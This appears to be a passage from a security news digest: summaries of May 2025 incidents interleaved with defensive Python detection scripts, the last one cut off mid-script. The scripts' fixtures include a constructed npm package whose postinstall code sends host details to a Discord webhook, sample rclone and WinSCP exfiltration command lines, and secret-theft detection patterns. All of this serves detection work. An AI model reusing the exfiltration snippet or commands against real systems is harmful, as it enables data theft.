Daily Brief

Each article below is followed by a generated summary.

Total articles found: 12764

Checks for new stories every ~15 minutes
2025-05-27 12:31:27 theregister RANSOMWARE Ransomware Disrupts MathWorks, MATLAB Licensing Center Still Offline
A ransomware attack on MathWorks has disrupted its flagship MATLAB software, which has more than five million users worldwide. MathWorks confirmed the incident after an outage that began on May 18 and was initially reported as a set of unrelated application problems. The most serious ongoing disruption is the MATLAB Licensing Center, which remains offline and is blocking new license verifications. Recovery efforts led by outside cybersecurity experts have restored most MATLAB functionality, but some services are still degraded or unavailable. The outage hit the education sector hardest, landing during exam season: students missed deadlines and some resorted to workarounds, including pirated copies. MathWorks has notified federal law enforcement and is posting progress updates on its status page, though full recovery is slow. Commercial customers running their own MATLAB license servers were largely unaffected, in contrast to academic users who depend on MathWorks-hosted licensing.
2025-05-27 11:54:07 thehackernews NATION STATE ACTIVITY Russian-Linked Hackers Target NGOs in Espionage Campaign
Microsoft has attributed an espionage campaign to Void Blizzard, a Russia-affiliated group active since at least April 2024 that targets government, defense, transportation, media, NGO, and healthcare organizations, mainly in NATO member states and other countries supporting Ukraine. The operation's goal is intelligence collection in support of Russian strategic objectives. The group relies on stolen credentials: phishing captures logins, which are then used to enter the organization and pull out sensitive email and files. A recent wave of spear-phishing used fake Microsoft Entra authentication pages against more than 20 NGOs in Europe and the United States. After gaining access, the operators use automation to harvest email and files in bulk from Exchange Online and Microsoft Graph. Its targeting overlaps with other Russian state actors, suggesting shared collection priorities. Microsoft notes a shift toward more direct credential theft and stresses the need for stronger identity protections in the targeted sectors.
2025-05-27 11:19:25 bleepingcomputer NATION STATE ACTIVITY Russian Void Blizzard Cyberspy Group Linked to Dutch Police Breach
Dutch authorities have linked a September 2024 breach of Dutch police systems to Void Blizzard, a Russian cyberespionage group. Using a stolen session cookie, the attackers authenticated as a police employee and accessed the Global Address List, exposing officers' work-related contact details. The Netherlands' intelligence services warn that, given the group's targeting pattern, other Dutch organizations were likely hit as well. Void Blizzard, also tracked as Laundry Bear, has been active since at least April 2024 and focuses on Ukraine and NATO member states. Its activity aligns with Russian strategic goals, particularly gaining access to government, defense, and critical-infrastructure networks. The group relies on spear-phishing and credential theft to get in and then exfiltrates sensitive data. Microsoft rates the group as a significant risk to NATO states and Ukraine's allies, especially in transportation and defense.
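The two Void Blizzard items above describe the same post-compromise pattern: a stolen session cookie replayed from attacker infrastructure, followed by bulk harvesting of directory and mailbox data through Exchange Online and Microsoft Graph. The script below is an added example (not from either article, and not Microsoft's or the Dutch authorities' tooling) of hunting for both behaviours in sign-in and Graph activity records. The record layout (ts, user, session, ip, op), the harvest-operation prefixes, the thresholds and all the log entries are assumptions constructed for the example, not a real Entra ID or Graph schema.

```python
# Added example: hunt for (1) a session cookie first seen from one address and
# later presented from another, and (2) bulk directory/mailbox reads by one
# principal inside a short window. Field names are assumptions, not a real
# Entra ID or Microsoft Graph log schema.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: an officer's session cookie is replayed from a second
# address that then enumerates users and reads other mailboxes; an analyst
# does ordinary mail reads.
SAMPLE_EVENTS = [
    {"ts": "2024-09-10T08:00:00", "user": "officer@police.example", "session": "sess-A1", "ip": "198.51.100.7", "op": "signin"},
    {"ts": "2024-09-10T08:05:00", "user": "officer@police.example", "session": "sess-A1", "ip": "198.51.100.7", "op": "GET /me/messages?$top=10"},
    {"ts": "2024-09-10T10:12:00", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users?$top=999"},
    {"ts": "2024-09-10T10:12:30", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users?$top=999&$skiptoken=p1"},
    {"ts": "2024-09-10T10:13:00", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users?$top=999&$skiptoken=p2"},
    {"ts": "2024-09-10T10:13:30", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users?$top=999&$skiptoken=p3"},
    {"ts": "2024-09-10T10:14:00", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users/alice@police.example/messages"},
    {"ts": "2024-09-10T10:14:30", "user": "officer@police.example", "session": "sess-A1", "ip": "203.0.113.9", "op": "GET /users/bob@police.example/messages"},
    {"ts": "2024-09-10T11:00:00", "user": "analyst@police.example", "session": "sess-B2", "ip": "198.51.100.8", "op": "signin"},
    {"ts": "2024-09-10T11:01:00", "user": "analyst@police.example", "session": "sess-B2", "ip": "198.51.100.8", "op": "GET /me/messages?$top=25"},
]

# Operations that read directory or mailbox content (illustrative list).
HARVEST_PREFIXES = ("GET /users", "GET /me/messages", "GET /me/contacts", "GET /me/drive")


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_session_replays(events):
    """Flag a session identifier seen from an address other than the one it
    was first observed from. One alert per (session, new address)."""
    first_ip, seen, alerts = {}, set(), []
    for e in sorted(events, key=_ts):
        sid = e["session"]
        if sid not in first_ip:
            first_ip[sid] = e["ip"]
            continue
        if e["ip"] != first_ip[sid] and (sid, e["ip"]) not in seen:
            seen.add((sid, e["ip"]))
            alerts.append({"session": sid, "user": e["user"], "first_ip": first_ip[sid],
                           "new_ip": e["ip"], "ts": e["ts"]})
    return alerts


def find_bulk_harvesting(events, window=timedelta(minutes=10), threshold=5):
    """Flag a (user, ip) pair issuing at least `threshold` directory or
    mailbox reads inside any interval of length `window` (sliding window)."""
    by_actor = defaultdict(list)
    for e in events:
        if e["op"].startswith(HARVEST_PREFIXES):
            by_actor[(e["user"], e["ip"])].append(_ts(e))
    alerts = []
    for (user, ip), times in by_actor.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append({"user": user, "ip": ip, "count": best,
                           "window_minutes": int(window.total_seconds() // 60)})
    return alerts


if __name__ == "__main__":
    for alert in find_session_replays(SAMPLE_EVENTS) + find_bulk_harvesting(SAMPLE_EVENTS):
        print(alert)
```

In production the replay rule needs an allowlist for legitimate address changes (mobile carriers, corporate VPN egress), or should compare ASN rather than raw IP, and the harvesting threshold has to be tuned per role since mail clients and admin tooling page through /users legitimately.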
2025-05-27 11:02:19 thehackernews MISCELLANEOUS Enhancing AI Security: Best Practices for Managing Non-Human Identities
Artificial intelligence is boosting productivity across enterprises, and with it the number of non-human identities (NHIs) such as service accounts, bots, and agents that need managing. The article cites roughly 45 machine identities for every human one, each holding a secret (an API key, token, or certificate) used to authenticate. Unlike human accounts, NHIs often have no enforced policy for credential rotation or permission scoping, which makes them a standing risk. AI and machine learning workloads amplify that risk because they reach more data, faster, and do so through these identities. A further failure mode is secrets leaking through AI tools themselves, for example a chatbot that surfaces a credential present in data it was given. The recommended practices are: audit the data sources AI systems read, centralize NHI inventory and management, prevent secrets from leaking into prompts and outputs, secure and review logs, and restrict what data AI systems can access. Developer awareness of secure AI deployment practices is essential. Organizations that govern machine identities rigorously and deploy AI securely will be able to benefit from AI without widening their attack surface.
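Two of the practices above are mechanical enough to show in code: stopping secrets from reaching an AI tool, and auditing machine identities for stale secrets and over-broad scope. The script below is an added example and not code from the article; the regex ruleset is illustrative rather than complete, the 90-day rotation window is an assumed policy, and the ticket text and NHI inventory are constructed (the AWS values are the placeholder keys from AWS documentation, the GitHub token and passwords are made up).

```python
# Added example: redact secret-looking strings before text is handed to an
# AI tool, and audit an NHI inventory for rotation and scope violations.
# Patterns are illustrative, not an exhaustive secret-scanning ruleset.
import re
from datetime import date

SECRET_PATTERNS = [
    ("aws_access_key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),            # AWS access key IDs start with AKIA
    ("github_pat", re.compile(r"\bghp_[A-Za-z0-9]{36}\b")),             # GitHub classic PATs start with ghp_
    ("private_key", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----")),
    ("jwt", re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b")),
    # name=value assignments whose name suggests a credential and whose value is a long opaque string
    ("generic_assignment", re.compile(
        r"(?i)((?:api[_-]?key|secret|token|password|passwd)[A-Za-z0-9_-]*)(\s*[:=]\s*['\"]?)([A-Za-z0-9_\-./+]{16,})")),
]


def _preview(secret):
    """Masked form safe to put in a finding; never the full secret."""
    return secret[:4] + "..." + secret[-4:] if len(secret) > 12 else "***"


def redact_secrets(text):
    """Replace secret-looking strings with placeholders; return the clean
    text plus findings that carry only a masked preview."""
    findings = []
    for label, pattern in SECRET_PATTERNS:
        def _sub(m, label=label):
            if label == "generic_assignment":           # keep the key name, drop the value
                findings.append({"type": label, "preview": _preview(m.group(3))})
                return f"{m.group(1)}{m.group(2)}[REDACTED:{label}]"
            findings.append({"type": label, "preview": _preview(m.group(0))})
            return f"[REDACTED:{label}]"
        text = pattern.sub(_sub, text)
    return {"text": text, "findings": findings}


def audit_identities(inventory, today, max_age_days=90):
    """Flag machine identities whose secret is older than the rotation
    window (assumed 90 days) or whose permissions include a wildcard."""
    issues = []
    for nhi in inventory:
        age = (today - date.fromisoformat(nhi["last_rotated"])).days
        if age > max_age_days:
            issues.append((nhi["name"], f"secret not rotated for {age} days"))
        if any(s == "*" or s.endswith(":*") for s in nhi["scopes"]):
            issues.append((nhi["name"], "wildcard permission scope"))
    return issues


# Constructed inputs.
SAMPLE_DOC = """Support ticket pasted into an internal chatbot:
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
GITHUB_TOKEN=ghp_0123456789abcdef0123456789abcdef0123
db_password = "hunter2hunter2hunter2"
Meeting at 3pm to discuss the rotation policy.
"""
SAMPLE_INVENTORY = [
    {"name": "ci-deploy-bot", "last_rotated": "2025-04-30", "scopes": ["repo:read", "deploy:write"]},
    {"name": "rag-indexer", "last_rotated": "2024-08-01", "scopes": ["docs:read"]},
    {"name": "chat-assistant", "last_rotated": "2025-05-01", "scopes": ["*"]},
]

if __name__ == "__main__":
    result = redact_secrets(SAMPLE_DOC)
    print(result["text"])
    print(result["findings"])
    print(audit_identities(SAMPLE_INVENTORY, date(2025, 5, 27)))
```

The redaction runs the specific patterns before the generic one so that a key already replaced by a placeholder is not matched a second time; findings carry a masked preview so the log that records the leak does not become a second copy of the secret.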
2025-05-27 09:55:42 thehackernews CYBERCRIME Novel Payroll Fraud Campaign Targets Employee Mobile Devices
ReliaQuest has documented an SEO poisoning campaign that exploits employees searching for their company's payroll portal. Attackers push fake login pages, cloned from the real portals, high in search results; employees who enter their credentials hand them to the attackers, who then log in to the payroll system and redirect paychecks to accounts they control. The attackers route their traffic through compromised home routers and mobile networks, so their logins appear to come from residential and mobile IP addresses rather than known-bad infrastructure, which defeats IP-reputation checks and makes the activity hard to track and attribute. They deliberately target employees on mobile devices, which typically have weaker security controls and connect from outside the corporate network, complicating detection and response. The activity was detected in May 2025 but belongs to an operation with related incidents dating back to late 2024. Blocking is hampered because the phishing sites evade scanners and rarely make it into threat intelligence feeds, and the routers used as proxies were compromised through router vulnerabilities.
2025-05-27 08:33:09 bleepingcomputer DATA BREACH Adidas Announces Data Breach via Third-Party Service Hack
Adidas has disclosed a data breach that originated with a hacked third-party customer service provider and exposed some customer data. The stolen information was limited to contact details; no payment data or passwords were involved. Adidas has brought in information security experts to investigate and has taken steps to contain the incident. It is notifying affected consumers as well as data protection and law enforcement authorities, as required by law. The company has had other breaches recently, with incidents in Turkey and South Korea also affecting customer information. Adidas has not named the service provider, said how many customers are affected, or stated whether its own network was compromised. The company reaffirmed its commitment to consumer privacy and security and apologised for the inconvenience.
2025-05-27 07:15:21 thehackernews CYBERCRIME FBI Warns Law Firms of Luna Moth's Stealth Phishing Attacks
The FBI has warned that Luna Moth, a cyber extortion group, is targeting law firms with social engineering rather than malware. The group practices callback phishing: an email prompts the victim to phone a number, where an operator posing as IT support talks them through installing a legitimate remote access tool such as Zoho Assist or AnyDesk, giving the attackers hands-on access without tripping antivirus. In a recent variation the group skips the email and phones targets directly, claiming to be the firm's own IT staff and guiding them into a remote session. Once inside, the attackers escalate privileges and use Rclone and WinSCP to exfiltrate sensitive files, then demand payment under threat of leaking them. Security firms tracking the group report a high volume of callback phishing against U.S. legal and financial firms, supported by helpdesk-themed domains registered to make the lure more convincing. Because every tool involved is legitimate software, the activity is hard to detect and counter with conventional controls.
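Because Luna Moth's tooling is all legitimate software, the useful signal is context: a remote access tool launched from a user's Downloads folder by a browser, or Rclone and WinSCP run in transfer mode by an ordinary user. The script below is an added example (not from the FBI alert or the article) of that logic over process-creation events. The event layout, the sanctioned RMM path, the browser parent heuristic and every record are assumptions constructed for the example; the loose "zoho" match stands in for Zoho Assist's several binaries.

```python
# Added example: hunt Sysmon-style process-creation records for the Luna Moth
# tool chain. Field names, the sanctioned RMM path and all records are
# constructed assumptions for the example.
import ntpath
import re

SAMPLE_EVENTS = [
    {"host": "LAW-WS01", "user": "FIRM\\jsmith",
     "image": "C:\\Users\\jsmith\\Downloads\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe",
     "parent": "C:\\Program Files\\Mozilla Firefox\\firefox.exe"},
    {"host": "LAW-WS01", "user": "FIRM\\jsmith",
     "image": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy \"C:\\Users\\jsmith\\Documents\\Clients\" mega:backup --transfers 8 -q",
     "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"host": "LAW-WS02", "user": "FIRM\\helpdesk",          # sanctioned copy, must not alert
     "image": "C:\\Program Files\\CorpRMM\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --service",
     "parent": "C:\\Windows\\System32\\services.exe"},
    {"host": "LAW-WS03", "user": "FIRM\\asmith",
     "image": "C:\\Program Files\\WinSCP\\WinSCP.exe",
     "cmdline": "WinSCP.exe /command \"open sftp://upload@203.0.113.50/\" \"put C:\\Users\\asmith\\Documents\\*.pdf\" \"exit\"",
     "parent": "C:\\Windows\\explorer.exe"},
    {"host": "LAW-WS03", "user": "FIRM\\asmith",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe memo.txt",
     "parent": "C:\\Windows\\explorer.exe"},
]

RMM_NAMES = ("anydesk", "zoho")                          # matched on the image file name
SANCTIONED_PREFIXES = ("c:\\program files\\corprmm\\",)   # where the firm's own RMM lives (assumed)
USER_WRITABLE = ("c:\\users\\", "\\appdata\\", "\\temp\\")
BROWSERS = ("firefox", "chrome", "msedge")
RCLONE_TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]+:")              # rclone remote syntax: name:path


def hunt(events):
    alerts = []
    for e in events:
        image = e["image"].lower()
        base = ntpath.basename(image)
        cmd = e["cmdline"]
        args = cmd.split()
        if any(n in base for n in RMM_NAMES) and not image.startswith(SANCTIONED_PREFIXES):
            detail = "RMM tool outside sanctioned path"
            if any(p in image for p in USER_WRITABLE):
                detail += ", launched from a user-writable location"
            if any(b in e["parent"].lower() for b in BROWSERS):
                detail += ", spawned by a browser (fresh download)"
            alerts.append({"rule": "unsanctioned_rmm", "host": e["host"], "user": e["user"], "detail": detail})
        elif base == "rclone.exe" and len(args) > 1 and args[1].lower() in RCLONE_TRANSFER_CMDS:
            # skip drive letters such as C:\ which also look like name:path
            remotes = [a for a in args[2:] if REMOTE_ARG.match(a) and a[1] != ":"]
            alerts.append({"rule": "rclone_transfer", "host": e["host"], "user": e["user"],
                           "detail": f"{args[1]} to remote {', '.join(remotes)}"})
        elif base == "winscp.exe" and ("/command" in cmd.lower() or "/script" in cmd.lower()):
            alerts.append({"rule": "winscp_scripted", "host": e["host"], "user": e["user"],
                           "detail": "scripted transfer: " + cmd})
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

A path allowlist is the simplest form of the sanctioned check; a real deployment should key on the signer or hash of the approved agent, since an attacker who gets admin can drop a binary under Program Files too.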
2025-05-27 07:00:06 thehackernews NATION STATE ACTIVITY Russia-Linked Hackers Use Weaponized Word Docs Against Tajikistan
Russia-aligned TAG-110 is targeting Tajikistan government entities with macro-enabled Word documents. The spear-phishing campaign marks a shift from the group's earlier HTML Application (.HTA) loaders to malicious Word templates. The operations are cyber espionage, aimed at collecting intelligence on regional politics and security around sensitive events. TAG-110 overlaps with Russian state-sponsored APT28, which has targeted European embassies and government bodies across Central and East Asia. The lure documents are dressed up as government-related content and carry the malicious template. When the macro runs, it copies the template into Word's Startup folder, so it loads on every launch of Word and gives the implant persistence, after which it contacts a command-and-control server. The secondary payloads have not been identified, but the group has previously deployed HATVIBE and CHERRYSPY, so those are the likely follow-on malware.
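The persistence trick above, a macro-carrying template dropped into Word's Startup folder, is easy to hunt for because an OOXML template only contains macros if the package has a word/vbaProject.bin part. The script below is an added example (not from the article or from Recorded Future's tooling): it builds constructed templates in a temporary stand-in for the per-user Startup folder, %APPDATA%\Microsoft\Word\STARTUP, and reports which ones carry a VBA project. The file names and contents are constructed; the placeholder vbaProject.bin is not a real VBA project.

```python
# Added example: flag macro-carrying templates in a Word Startup folder by
# checking each OOXML package for a word/vbaProject.bin part. The sample
# files are constructed; the VBA part here is only a placeholder.
import io
import os
import tempfile
import zipfile

# Minimal package skeleton so the constructed templates are valid zips.
CONTENT_TYPES = b'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'
TEMPLATE_EXTS = (".dotm", ".dotx", ".docm", ".docx", ".dot")


def build_template(with_macro):
    """Bytes of a constructed Word template; a macro-enabled one carries a
    word/vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", b"<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder VBA project")
    return buf.getvalue()


def has_vba_project(path):
    """True if an OOXML document contains a VBA project, False if not, None
    for legacy OLE2 (.dot/.doc) files, which this example does not parse."""
    if not zipfile.is_zipfile(path):
        return None
    with zipfile.ZipFile(path) as z:
        return any(name.lower() == "word/vbaproject.bin" for name in z.namelist())


def scan_startup_folder(folder):
    """Map each template-like file in `folder` to its macro status."""
    results = {}
    for name in sorted(os.listdir(folder)):
        if name.lower().endswith(TEMPLATE_EXTS):
            results[name] = has_vba_project(os.path.join(folder, name))
    return results


def demo():
    """Populate a temporary stand-in for the per-user Word STARTUP folder
    with constructed files and scan it."""
    with tempfile.TemporaryDirectory() as startup:
        samples = {
            "Report_Template.dotm": build_template(with_macro=True),
            "Letterhead.dotx": build_template(with_macro=False),
            "Old.dot": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64,   # OLE2 header, legacy format
            "notes.txt": b"not a template",
        }
        for name, data in samples.items():
            with open(os.path.join(startup, name), "wb") as f:
                f.write(data)
        return scan_startup_folder(startup)


if __name__ == "__main__":
    labels = {True: "MACRO", False: "no macro", None: "legacy format, inspect manually"}
    for name, status in demo().items():
        print(f"{name}: {labels[status]}")
```

On a real host the scan should cover the global Startup folder under the Office installation as well as the per-user one, and legacy .dot files need an OLE parser such as oletools' olevba rather than the zip check used here.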
2025-05-26 14:19:07 thehackernews MALWARE Malicious npm and VS Code Packages Used in Data Theft
Researchers identified more than 60 malicious npm packages and eight VS Code extensions built to steal host data, including IP addresses, DNS server settings, and user directory paths. The npm packages send the collected data to an attacker-controlled Discord endpoint and have been downloaded over 9,000 times in total. They include sandbox-evasion checks and target Windows, macOS, and Linux. Some pose as legitimate helper libraries while carrying destructive payloads that delete files or crash the system. The VS Code extensions hide malicious code alongside working features and target cryptocurrency wallet credentials. The activity is a reminder that public registries and marketplaces remain a cheap route for supply chain attacks. A phishing operation that also used npm packages has been connected to the same activity, combining package-based and social-engineering tactics. Monitoring new dependencies and their install-time behaviour remains the practical defence.
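The combination described above (an install-time script, host reconnaissance, and a Discord webhook for exfiltration) is cheap to check for before a package is allowed into a build. The script below is an added example, not from the article or the researchers' tooling: it scans an unpacked package directory for lifecycle hooks, Discord webhook URLs and Node host-recon APIs, then triages the result. It applies equally to a VS Code extension, which is also a package.json plus JavaScript. The two packages it scans are constructed; their names, the webhook id and token, and the triage rules are assumptions for the example.

```python
# Added example: static triage of an unpacked npm package or VS Code
# extension for install hooks, Discord webhook exfiltration and host recon.
# Both sample packages, their names and the webhook URL are constructed.
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Discord webhook URL shape; the id/token in the sample are fake.
WEBHOOK_RE = re.compile(r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
# Node APIs that read the host details the campaign collected.
RECON_CALLS = ("os.networkInterfaces", "dns.getServers", "os.homedir", "os.userInfo", "os.hostname")
SOURCE_EXTS = (".js", ".mjs", ".cjs", ".ts")


def scan_package(pkg_dir):
    """Return (type, detail) findings for one unpacked package."""
    findings = []
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as f:
        manifest = json.load(f)
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(("install_hook", f"{hook}: {scripts[hook]}"))
    for root, _, files in os.walk(pkg_dir):
        for name in files:
            if not name.endswith(SOURCE_EXTS):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, pkg_dir)
            with open(path, encoding="utf-8", errors="replace") as f:
                src = f.read()
            for url in WEBHOOK_RE.findall(src):
                findings.append(("discord_webhook", f"{rel}: {url}"))
            hits = [c for c in RECON_CALLS if c in src]
            if hits:
                findings.append(("host_recon", f"{rel}: {', '.join(hits)}"))
    return findings


def triage(findings):
    """Webhook exfil, or an install hook combined with recon, is high; recon
    alone is common in legitimate packages and only merits review."""
    kinds = {k for k, _ in findings}
    if "discord_webhook" in kinds or {"install_hook", "host_recon"} <= kinds:
        return "high"
    return "review" if kinds else "clean"


MALICIOUS_PKG = {
    "package.json": json.dumps({"name": "express-logger-utils", "version": "1.0.3",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": """const os = require("os");
const dns = require("dns");
const report = { ifaces: os.networkInterfaces(), dns: dns.getServers(), home: os.homedir() };
fetch("https://discord.com/api/webhooks/1234567890/AbCdEfGhIjKlMnOp-qrstuvwxyz", {
  method: "POST", body: JSON.stringify(report) });
""",
}
BENIGN_PKG = {
    "package.json": json.dumps({"name": "left-pad-lite", "version": "0.1.0",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s, n) => String(s).padStart(n);\n",
}


def demo():
    """Write both constructed packages to a temp dir and return
    {name: (verdict, findings)}."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as root:
        for files in (MALICIOUS_PKG, BENIGN_PKG):
            name = json.loads(files["package.json"])["name"]
            pkg_dir = os.path.join(root, name)
            os.makedirs(pkg_dir)
            for fname, content in files.items():
                with open(os.path.join(pkg_dir, fname), "w", encoding="utf-8") as f:
                    f.write(content)
            findings = scan_package(pkg_dir)
            verdicts[name] = (triage(findings), findings)
    return verdicts


if __name__ == "__main__":
    for name, (verdict, findings) in demo().items():
        print(name, verdict, findings)
```

Static string matching misses obfuscated code, which these packages often use; the complementary control is to install with lifecycle scripts disabled (npm's ignore-scripts setting) so that a hook cannot run until someone has looked at it.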
2025-05-26 09:32:36 thehackernews NATION STATE ACTIVITY International Operation Disrupts Russian-Linked Malware Network
A coordinated law enforcement and private sector action has taken down infrastructure behind two major malware operations, Lumma Stealer and DanaBot. Sixteen individuals have been charged over the development and operation of DanaBot, a versatile data stealer that can also hijack online banking sessions. DanaBot has been repurposed by Russian state-backed actors for more targeted intrusions, an example of commodity crimeware being adopted for state-sponsored operations. Roughly 2,300 domains and 300 servers that made up Lumma's command-and-control network were seized, severely disrupting the infostealer. In related actions under Operation Endgame, about 650 domains used to launch ransomware attacks were neutralized. The takedowns underscore the value of international cooperation against cybercrime and the blurring line between criminal and nation-state malware use.
2025-05-26 04:51:28 thehackernews MISCELLANEOUS Essential Guide to Proactive Web Privacy Validation for CISOs
The guide argues for moving web privacy programs from static, audit-based checks to continuous monitoring. It cites a finding that 70% of major US websites keep tracking users via cookies even after they opt out, so those sites' stated privacy commitments are not honoured in practice. Continuous privacy validation tools are recommended to monitor websites and their third-party scripts in real time. Traditional, reactive privacy controls only surface problems after the fact, leading to undetected violations and regulatory penalties; the guide cites a global retailer and a bank that suffered significant fines and reputational damage from third-party scripts that violated privacy rules. Fewer than a quarter of companies are confident in their privacy compliance; continuous validation can raise that confidence while integrating with existing security processes and adding little operational overhead. The guide urges CISOs to put web privacy validation in place now, ahead of stricter regulation arriving in 2025, including the EU AI Act and New Hampshire's NHPA.
2025-05-26 04:35:18 theregister DATA BREACH Security Roundup: TeleMessage Breach Exposes Government Staff Messages, Operation Endgame II Arrests, and More
A breach at the messaging service TeleMessage exposed communications of more than 60 government workers, including a White House staffer and Secret Service members; the data, which included messages from the Trump administration, was reported by Reuters and posted on Distributed Denial of Secrets. Separately, Europol announced Operation Endgame II, which produced 20 arrests, disrupted five major malware operations including Qakbot and DanaBot, and seized €21.2 million. In vulnerability management, researchers proposed a predictive model for patch prioritization, and CISA and partner agencies are using the Exploit Prediction Scoring System and have proposed a list of likely exploited vulnerabilities to better anticipate which flaws need attention first. GoDaddy settled with the FTC over security failings that went undetected for three years and led to customer outages and infected sites. A vpnMentor researcher found an unsecured online trove of 184 million unique login credentials, apparently compiled from infostealer malware.
2025-05-26 02:32:43 theregister MISCELLANEOUS China Introduces National Online ID Scheme and Tech Updates
China has approved a national online identification system that gives citizens a single Cyberspace ID, issued after identity verification, for signing in to both government and private online services, with the stated aim of improving online security. Taking up an ID is voluntary, and platforms are barred from discriminating against users who keep using conventional sign-in methods. Adoption so far is modest relative to China's population: the Cyberspace ID app has passed 16 million downloads and 12.5 million authentications. In other news from the region, Xiaomi announced custom silicon for its devices as part of a long-term push to own core technologies; NTT Docomo, which created the original emoji set, plans to retire its custom emoji, reflecting changed preferences in graphic communication on mobile devices; and Taiwan's MediaTek said its 2nm chip technology is nearing completion, with AI features planned across its product range.
2025-05-25 14:42:27 bleepingcomputer MISCELLANEOUS Glitch to Terminate App Hosting and User Profiles in July
Glitch will end app hosting and user profiles on July 8, citing rising operational costs and abuse of the platform. CEO Anil Dash said the decision reflects the platform's ageing architecture and the availability of better alternatives. Existing users can access the dashboard until the end of the year to download their project code and set up URL redirects, which will remain active until at least 2026. Paid Glitch Pro subscriptions will be honoured until the shutdown date, with refunds for any remaining paid time. Launched in 2017, Glitch.com became a fixture of the web development community for its approachable interface and real-time collaboration. The company plans to publish a detailed migration guide and to keep supporting users through its community forum during the transition.
2025-05-25 07:43:07 thehackernews MALWARE Malware Campaign Exploits Fake VPN and Browser Installers
Researchers have uncovered a malware campaign that uses fake installers for LetsVPN and QQ Browser to deliver the Winos 4.0 framework. The installers drop Catena, a multi-stage loader that stages its payloads in memory to evade file-based antivirus. Winos 4.0, linked to the threat actor tracked as Void Arachne or Silver Fox, has been active throughout 2025 and keeps adjusting its tactics to avoid detection. The campaign targets Chinese-language users, with a particular focus on Taiwan, where phishing lures impersonate the National Taxation Bureau. Winos 4.0 is plugin-based, with modules for data harvesting, remote access, and potential DDoS. Catena hides shellcode inside .ini files and loads it through reflective DLL injection to stay stealthy and persistent on infected hosts. Recent builds add a PowerShell command intended to bypass Microsoft Defender and check for specific antivirus processes before running.
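Shellcode stashed in a configuration file, as Catena does with .ini files, tends to stand out statistically: real INI values are short or low-entropy, while an encoded payload is a long, near-random blob. The script below is an added example, not from the article or the researchers' analysis: it parses an INI document, flags long high-entropy values, and, where a value base64-decodes, checks the leading bytes against two well-known prefixes (the cld; and rsp,-16 prologue of common Windows x64 stager shellcode, and the MZ header of a PE file). The INI content is constructed, the "payload" is a fake blob with that prologue followed by deterministic filler rather than real shellcode, and the length and entropy thresholds are assumptions to tune.

```python
# Added example: find long, high-entropy values in an INI file and hint at
# what they decode to. The sample INI and its "payload" are constructed;
# the thresholds are starting points, not calibrated values.
import base64
import configparser
import math
from collections import Counter

# Decoded-byte prefixes worth a second look (illustrative, not exhaustive).
SUSPICIOUS_PREFIXES = {
    b"\xfc\x48\x83\xe4\xf0": "x64 shellcode prologue (cld; and rsp,-16)",
    b"MZ": "PE header",
}


def shannon_entropy(s):
    """Bits per character; random base64 approaches ~6, English text ~4."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def decode_hint(value):
    """Try base64; report a known prefix in the decoded bytes, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (ValueError, TypeError):
        return None
    for prefix, label in SUSPICIOUS_PREFIXES.items():
        if raw.startswith(prefix):
            return label
    return None


def scan_ini(text, min_len=64, min_entropy=4.5):
    """Flag values at least `min_len` characters long with entropy of at
    least `min_entropy` bits per character."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str           # keep key case as written
    cfg.read_string(text)
    hits = []
    for section in cfg.sections():
        for key, value in cfg.items(section):
            compact = "".join(value.split())   # blobs are sometimes line-wrapped
            if len(compact) < min_len:
                continue
            ent = shannon_entropy(compact)
            if ent >= min_entropy:
                hits.append({"section": section, "key": key, "length": len(compact),
                             "entropy": round(ent, 2), "hint": decode_hint(compact)})
    return hits


# Constructed sample: ordinary settings plus a base64 "payload" whose decoded
# bytes begin with the stager prologue followed by deterministic filler.
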